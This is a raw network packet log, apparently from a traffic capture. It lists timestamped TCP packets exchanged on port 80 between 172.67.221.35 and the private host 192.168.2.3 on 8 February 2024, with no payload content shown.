                                                                                                                                                                    Feb 8, 2024 19:08:49.883394957 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.883405924 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.883415937 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.883415937 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.883415937 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.883415937 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.883430004 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.883444071 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.883449078 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.883459091 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.883471966 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.883483887 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.883485079 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.883500099 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.883502007 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.883512020 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.883532047 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.884032011 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.884082079 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.884212971 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.884228945 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.884241104 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.884257078 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.884269953 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.884270906 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.884285927 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.884298086 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.884310007 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.884320974 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.884320974 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.884322882 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.884337902 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.884346008 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.884351015 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.884363890 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.884371996 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.884377003 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.884390116 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.884397984 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.884402990 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.884414911 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.884426117 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.884429932 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.884443045 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.884454966 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.884455919 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.884469986 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.884471893 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.884484053 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.884501934 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.884928942 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.884974003 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.884978056 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.884989023 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.885001898 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.885019064 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.885169983 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.885183096 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.885190964 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.885211945 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.885215998 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.885226011 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.885247946 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.885261059 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.885273933 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.885286093 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.885299921 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.885313034 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.885325909 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.885332108 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.885339022 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.885344982 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.885351896 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.885360003 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.885359049 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.885359049 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.885359049 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.885382891 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.885386944 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.885423899 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.885859013 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.885904074 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.885911942 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.885917902 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.885932922 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.885950089 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.886024952 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.886039972 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.886051893 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.886064053 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.886065006 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.886080980 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.886082888 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.886095047 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.886112928 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.886112928 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.886141062 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.886152983 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.886154890 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.886167049 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.886181116 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.886185884 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.886197090 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.886209011 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.886212111 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.886221886 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.886236906 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.886249065 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.886250019 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.886266947 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.886270046 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.886286020 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.886317015 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.886836052 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.886850119 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.886869907 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.886882067 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.886883974 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.886894941 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.886907101 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.886917114 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.887079000 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.887101889 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.887125015 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.887293100 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.887307882 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.887320042 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.887332916 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.887345076 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.887345076 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.887360096 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.887367964 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.887373924 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.887387037 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.887398958 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.887399912 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.887412071 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.887417078 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.887419939 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.887439013 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.887445927 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.887455940 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.887468100 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.887480974 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.887482882 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.887495041 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.887507915 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.887520075 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.887528896 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.887533903 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.887537003 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.887548923 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.887561083 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.887567997 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.887595892 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.887980938 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888003111 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888026953 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.888086081 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888099909 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888111115 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888123989 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888135910 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888149023 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888161898 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888164043 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.888164043 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.888175964 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.888197899 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888200045 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.888211966 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888226986 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888240099 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888246059 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.888268948 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.888331890 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888345957 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888358116 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888369083 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888380051 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.888381004 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888395071 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888406992 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.888407946 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888422012 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888425112 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.888433933 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888454914 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.888957977 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888972998 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888984919 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.888995886 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.889003038 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.889012098 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.889022112 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.889049053 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.889055014 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.889064074 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.889075041 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.889087915 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.889103889 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.889122009 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.889246941 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.889261961 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.889273882 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.889285088 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.889300108 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.889312029 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.889314890 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.889326096 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.889339924 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.889348984 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.889352083 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.889365911 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.889377117 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.889386892 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.889389992 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.889404058 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.889415979 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.889432907 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.889836073 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.889897108 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.889909983 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.889930964 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.889934063 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.889961004 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.890136957 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890151978 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890158892 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890166044 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890177965 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890189886 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890202045 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890207052 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.890214920 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890228033 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890239954 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890259981 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890273094 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890279055 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.890279055 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.890289068 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890299082 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.890304089 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890316963 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890325069 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.890330076 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890341997 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890342951 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.890355110 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890388966 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.890819073 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890834093 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890870094 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.890887022 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890901089 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890921116 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.890949965 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890963078 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890974998 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.890984058 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.890988111 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.891001940 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.891012907 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.891030073 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.891061068 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.891073942 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.891086102 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.891098022 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.891109943 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.891115904 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.891124010 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.891134977 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.891144991 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.891148090 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.891160965 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.891165018 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.891174078 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.891180992 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.891186953 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.891200066 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.891211987 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.891212940 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.891238928 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.891730070 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.891779900 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.891792059 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.891807079 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.891818047 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.891830921 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.891841888 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.891841888 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.891861916 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.892021894 CET8049717172.67.221.35192.168.2.3
